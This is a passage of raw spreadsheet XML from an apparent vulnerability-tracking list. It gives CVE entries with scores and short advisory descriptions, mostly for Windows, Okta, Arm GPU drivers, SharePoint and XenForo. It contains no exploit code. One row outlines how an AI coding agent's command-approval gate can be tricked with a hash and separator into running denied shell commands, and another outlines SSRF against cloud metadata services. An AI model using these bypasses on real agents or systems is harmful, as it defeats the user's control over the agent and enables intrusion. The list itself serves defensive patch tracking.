t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t></is></c></row><row r="690"><c r="A690" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B690" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C690" s="5" t="inlineStr"><is><t>CVE-2026-83980</t></is></c><c r="D690" s="5" t="n"><v>7.8</v></c><c r="E690" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F690" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G690" s="5" t="inlineStr" /><c r="H690" s="5" t="n"><v>0.003</v></c><c r="I690" s="5" t="inlineStr" /><c r="J690" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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0" s="5" t="inlineStr" /><c r="M690" s="5" t="inlineStr" /><c r="N690" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O690" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P690" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q690" s="5" t="inlineStr" /><c r="R690" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S690" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t></is></c></row><row r="691"><c r="A691" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B691" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C691" s="5" t="inlineStr"><is><t>CVE-2026-83981</t></is></c><c r="D691" s="5" t="n"><v>7.8</v></c><c r="E691" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F691" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G691" s="5" t="inlineStr" /><c r="H691" s="5" t="n"><v>0.003</v></c><c r="I691" s="5" t="inlineStr" /><c r="J691" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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1" s="5" t="inlineStr" /><c r="M691" s="5" t="inlineStr" /><c r="N691" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O691" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P691" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q691" s="5" t="inlineStr" /><c r="R691" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S691" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t></is></c></row><row r="692"><c r="A692" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B692" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C692" s="5" t="inlineStr"><is><t>CVE-2026-83982</t></is></c><c r="D692" s="5" t="n"><v>7.8</v></c><c r="E692" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F692" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G692" s="5" t="inlineStr" /><c r="H692" s="5" t="n"><v>0.003</v></c><c r="I692" s="5" t="inlineStr" /><c r="J692" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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2" s="5" t="inlineStr" /><c r="M692" s="5" t="inlineStr" /><c r="N692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O692" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P692" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q692" s="5" t="inlineStr" /><c r="R692" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S692" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t></is></c></row><row r="693"><c r="A693" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B693" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C693" s="5" t="inlineStr"><is><t>CVE-2026-83983</t></is></c><c r="D693" s="5" t="n"><v>7.8</v></c><c r="E693" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F693" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G693" s="5" t="inlineStr" /><c r="H693" s="5" t="n"><v>0.003</v></c><c r="I693" s="5" t="inlineStr" /><c r="J693" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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3" s="5" t="inlineStr" /><c r="M693" s="5" t="inlineStr" /><c r="N693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O693" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P693" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q693" s="5" t="inlineStr" /><c r="R693" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S693" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t></is></c></row><row r="694"><c r="A694" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B694" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C694" s="5" t="inlineStr"><is><t>CVE-2026-83985</t></is></c><c r="D694" s="5" t="n"><v>7.8</v></c><c r="E694" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F694" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G694" s="5" t="inlineStr" /><c r="H694" s="5" t="n"><v>0.003</v></c><c r="I694" s="5" t="inlineStr" /><c r="J694" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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4" s="5" t="inlineStr" /><c r="M694" s="5" t="inlineStr" /><c r="N694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O694" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P694" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q694" s="5" t="inlineStr" /><c r="R694" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S694" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t></is></c></row><row r="695"><c r="A695" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B695" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C695" s="5" t="inlineStr"><is><t>CVE-2026-83986</t></is></c><c r="D695" s="5" t="n"><v>7.8</v></c><c r="E695" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F695" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G695" s="5" t="inlineStr" /><c r="H695" s="5" t="n"><v>0.003</v></c><c r="I695" s="5" t="inlineStr" /><c r="J695" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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5" s="5" t="inlineStr" /><c r="M695" s="5" t="inlineStr" /><c r="N695" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O695" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P695" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q695" s="5" t="inlineStr" /><c r="R695" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S695" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T695" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t></is></c></row><row r="696"><c r="A696" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B696" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C696" s="5" t="inlineStr"><is><t>CVE-2026-83987</t></is></c><c r="D696" s="5" t="n"><v>7.8</v></c><c r="E696" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F696" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G696" s="5" t="inlineStr" /><c r="H696" s="5" t="n"><v>0.003</v></c><c r="I696" s="5" t="inlineStr" /><c r="J696" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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6" s="5" t="inlineStr" /><c r="M696" s="5" t="inlineStr" /><c r="N696" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O696" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P696" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q696" s="5" t="inlineStr" /><c r="R696" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S696" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T696" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t></is></c></row><row r="697"><c r="A697" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B697" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C697" s="5" t="inlineStr"><is><t>CVE-2026-83988</t></is></c><c r="D697" s="5" t="n"><v>7.8</v></c><c r="E697" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F697" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G697" s="5" t="inlineStr" /><c r="H697" s="5" t="n"><v>0.003</v></c><c r="I697" s="5" t="inlineStr" /><c r="J697" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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7" s="5" t="inlineStr" /><c r="M697" s="5" t="inlineStr" /><c r="N697" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O697" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P697" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q697" s="5" t="inlineStr" /><c r="R697" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S697" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T697" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t></is></c></row><row r="698"><c r="A698" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B698" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C698" s="5" t="inlineStr"><is><t>CVE-2026-83990</t></is></c><c r="D698" s="5" t="n"><v>7.8</v></c><c r="E698" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F698" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G698" s="5" t="inlineStr" /><c r="H698" s="5" t="n"><v>0.003</v></c><c r="I698" s="5" t="inlineStr" /><c r="J698" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K698" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L698" s="5" t="inlineStr" /><c r="M698" s="5" t="inlineStr" /><c r="N698" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O698" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P698" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q698" s="5" t="inlineStr" /><c r="R698" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S698" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T698" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t></is></c></row><row r="699"><c r="A699" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B699" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C699" s="5" t="inlineStr"><is><t>CVE-2026-83995</t></is></c><c r="D699" s="5" t="n"><v>7.8</v></c><c r="E699" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F699" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G699" s="5" t="inlineStr" /><c r="H699" s="5" t="n"><v>0.003</v></c><c r="I699" s="5" t="inlineStr" /><c r="J699" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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99" s="5" t="inlineStr" /><c r="M699" s="5" t="inlineStr" /><c r="N699" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O699" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P699" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q699" s="5" t="inlineStr" /><c r="R699" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S699" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T699" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t></is></c></row><row r="700"><c r="A700" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B700" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C700" s="5" t="inlineStr"><is><t>CVE-2026-84000</t></is></c><c r="D700" s="5" t="n"><v>7.8</v></c><c r="E700" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F700" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G700" s="5" t="inlineStr" /><c r="H700" s="5" t="n"><v>0.003</v></c><c r="I700" s="5" t="inlineStr" /><c r="J700" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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00" s="5" t="inlineStr" /><c r="M700" s="5" t="inlineStr" /><c r="N700" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O700" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P700" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q700" s="5" t="inlineStr" /><c r="R700" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S700" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t></is></c><c r="T700" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t></is></c></row><row r="701"><c r="A701" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B701" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C701" s="5" t="inlineStr"><is><t>CVE-2026-85983</t></is></c><c r="D701" s="5" t="n"><v>7.8</v></c><c r="E701" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F701" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G701" s="5" t="inlineStr" /><c r="H701" s="5" t="n"><v>0.001</v></c><c r="I701" s="5" t="inlineStr" /><c r="J701" s="5" t="inlineStr" /><c r="K701" s="5" t="inlineStr" /><c r="L701" s="5" t="inlineStr" /><c r="M701" s="5" t="inlineStr" /><c r="N701" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O701" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P701" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q701" s="5" t="inlineStr" /><c r="R701" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S701" s="5" t="inlineStr"><is><t>The Auth0 AD/LDAP Connector improperly processes a configuration value during service startup. This allows a low-privileged user on the host system to modify the connector's configuration. When the service restarts, the modified configuration can lead to code execution with the privileges of the service account.</t></is></c><c r="T701" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t></is></c></row><row r="702"><c r="A702" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B702" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C702" s="5" t="inlineStr"><is><t>CVE-2026-9034</t></is></c><c r="D702" s="5" t="n"><v>7.8</v></c><c r="E702" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F702" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G702" s="5" t="inlineStr" /><c r="H702" s="5" t="n"><v>0.001</v></c><c r="I702" s="5" t="inlineStr" /><c r="J702" s="5" t="inlineStr" /><c r="K702" s="5" t="inlineStr" /><c r="L702" s="5" t="inlineStr" /><c r="M702" s="5" t="inlineStr" /><c r="N702" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O702" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P702" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q702" s="5" t="inlineStr" /><c r="R702" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S702" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.



This issue affects Bifrost GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p3; Valhall GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T702" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t></is></c></row><row r="703"><c r="A703" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B703" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C703" s="5" t="inlineStr"><is><t>CVE-2026-19397</t></is></c><c r="D703" s="5" t="n"><v>7.7</v></c><c r="E703" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F703" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G703" s="5" t="inlineStr" /><c r="H703" s="5" t="n"><v>0.002</v></c><c r="I703" s="5" t="inlineStr" /><c r="J703" s="5" t="inlineStr" /><c r="K703" s="5" t="inlineStr" /><c r="L703" s="5" t="inlineStr" /><c r="M703" s="5" t="inlineStr" /><c r="N703" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O703" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P703" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q703" s="5" t="inlineStr" /><c r="R703" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S703" s="5" t="inlineStr"><is><t>Missing authentication for a critical function in ASUS Control Center Express Agent allows an unauthenticated nearby user to control the host via a direct connection to the agent when the host has an active login session.
Refer to the ' 
Security Update for ASUS Control Center Express Agent ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T703" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t></is></c></row><row r="704"><c r="A704" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B704" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C704" s="5" t="inlineStr"><is><t>CVE-2026-66767</t></is></c><c r="D704" s="5" t="n"><v>7.7</v></c><c r="E704" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F704" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G704" s="5" t="inlineStr" /><c r="H704" s="5" t="n"><v>0.003</v></c><c r="I704" s="5" t="inlineStr" /><c r="J704" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K704" s="5" t="inlineStr" /><c r="L704" s="5" t="inlineStr" /><c r="M704" s="5" t="inlineStr" /><c r="N704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O704" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P704" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q704" s="5" t="inlineStr" /><c r="R704" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S704" s="5" t="inlineStr"><is><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is></c><c r="T704" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t></is></c></row><row r="705"><c r="A705" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B705" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C705" s="5" t="inlineStr"><is><t>CVE-2026-69683</t></is></c><c r="D705" s="5" t="n"><v>7.7</v></c><c r="E705" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G705" s="5" t="inlineStr" /><c r="H705" s="5" t="n"><v>0.008</v></c><c r="I705" s="5" t="inlineStr" /><c r="J705" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K705" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L705" s="5" t="inlineStr" /><c r="M705" s="5" t="inlineStr" /><c r="N705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O705" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P705" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q705" s="5" t="inlineStr" /><c r="R705" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S705" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T705" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t></is></c></row><row r="706"><c r="A706" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B706" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C706" s="5" t="inlineStr"><is><t>CVE-2026-73315</t></is></c><c r="D706" s="5" t="n"><v>7.7</v></c><c r="E706" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F706" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G706" s="5" t="inlineStr" /><c r="H706" s="5" t="n"><v>0.003</v></c><c r="I706" s="5" t="inlineStr" /><c r="J706" s="5" t="inlineStr" /><c r="K706" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L706" s="5" t="inlineStr" /><c r="M706" s="5" t="inlineStr" /><c r="N706" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O706" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P706" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q706" s="5" t="inlineStr" /><c r="R706" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S706" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t></is></c><c r="T706" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t></is></c></row><row r="707"><c r="A707" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B707" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C707" s="5" t="inlineStr"><is><t>CVE-2026-77909</t></is></c><c r="D707" s="5" t="n"><v>7.7</v></c><c r="E707" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F707" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G707" s="5" t="inlineStr" /><c r="H707" s="5" t="n"><v>0.006</v></c><c r="I707" s="5" t="inlineStr" /><c r="J707" s="5" t="inlineStr" /><c r="K707" s="5" t="inlineStr" /><c r="L707" s="5" t="inlineStr" /><c r="M707" s="5" t="inlineStr" /><c r="N707" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q707" s="5" t="inlineStr" /><c r="R707" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S707" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t></is></c><c r="T707" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t></is></c></row><row r="708"><c r="A708" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B708" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C708" s="5" t="inlineStr"><is><t>CVE-2026-78623</t></is></c><c r="D708" s="5" t="n"><v>7.7</v></c><c r="E708" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F708" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G708" s="5" t="inlineStr" /><c r="H708" s="5" t="n"><v>0.002</v></c><c r="I708" s="5" t="inlineStr" /><c r="J708" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K708" s="5" t="inlineStr" /><c r="L708" s="5" t="inlineStr" /><c r="M708" s="5" t="inlineStr" /><c r="N708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O708" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P708" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q708" s="5" t="inlineStr" /><c r="R708" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S708" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize SAML assertion values before interpolating them into database queries in the advanced mode datastore configuration. The unsanitized values are substituted directly into the query string prior to preparation, resulting in unintended SQL execution against the configured backend database.</t></is></c><c r="T708" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t></is></c></row><row r="709"><c r="A709" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B709" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C709" s="5" t="inlineStr"><is><t>CVE-2026-82537</t></is></c><c r="D709" s="5" t="n"><v>7.7</v></c><c r="E709" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F709" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G709" s="5" t="inlineStr" /><c r="H709" s="5" t="n"><v>0.003</v></c><c r="I709" s="5" t="inlineStr" /><c r="J709" s="5" t="inlineStr" /><c r="K709" s="5" t="inlineStr" /><c r="L709" s="5" t="inlineStr" /><c r="M709" s="5" t="inlineStr" /><c r="N709" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O709" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P709" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q709" s="5" t="inlineStr" /><c r="R709" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S709" s="5" t="inlineStr"><is><t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t></is></c><c r="T709" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t></is></c></row><row r="710"><c r="A710" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B710" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C710" s="5" t="inlineStr"><is><t>CVE-2026-9040</t></is></c><c r="D710" s="5" t="n"><v>7.7</v></c><c r="E710" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F710" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G710" s="5" t="inlineStr" /><c r="H710" s="5" t="n"><v>0.001</v></c><c r="I710" s="5" t="inlineStr" /><c r="J710" s="5" t="inlineStr" /><c r="K710" s="5" t="inlineStr" /><c r="L710" s="5" t="inlineStr" /><c r="M710" s="5" t="inlineStr" /><c r="N710" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O710" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P710" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q710" s="5" t="inlineStr" /><c r="R710" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S710" s="5" t="inlineStr"><is><t>A race condition vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to cause a denial of service or disclose sensitive information.



